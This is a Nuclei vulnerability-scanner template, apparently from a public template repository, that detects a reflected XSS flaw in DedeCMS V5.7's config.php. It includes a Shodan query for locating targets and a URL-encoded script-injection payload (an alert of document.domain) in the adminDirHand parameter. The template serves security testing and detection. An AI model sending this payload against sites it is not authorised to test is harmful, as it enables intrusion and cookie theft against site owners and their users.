nuclei-templates/vulnerabilities/dedecms/dedecms-config-xss.yaml

38 lines
996 B
YAML

id: dedecms-config-xss
info:
name: DedeCMS V5.7 config.php XSS
author: ritikchaddha
severity: medium
description: |
DeDeCMS v5.7 has an XSS vulnerability in the '/include/dialog/config.php' file, and attackers can use this vulnerability to steal user cookies, hang horses, etc.
reference:
- https://www.zilyun.com/8665.html
- https://www.60ru.com/161.html
- https://www.cnblogs.com/milantgh/p/3615853.html
metadata:
verified: true
shodan-query: http.html:"DedeCms"
tags: dedecms,xss
requests:
- method: GET
path:
- "{{BaseURL}}/include/dialog/config.php?adminDirHand=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "location='../../</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200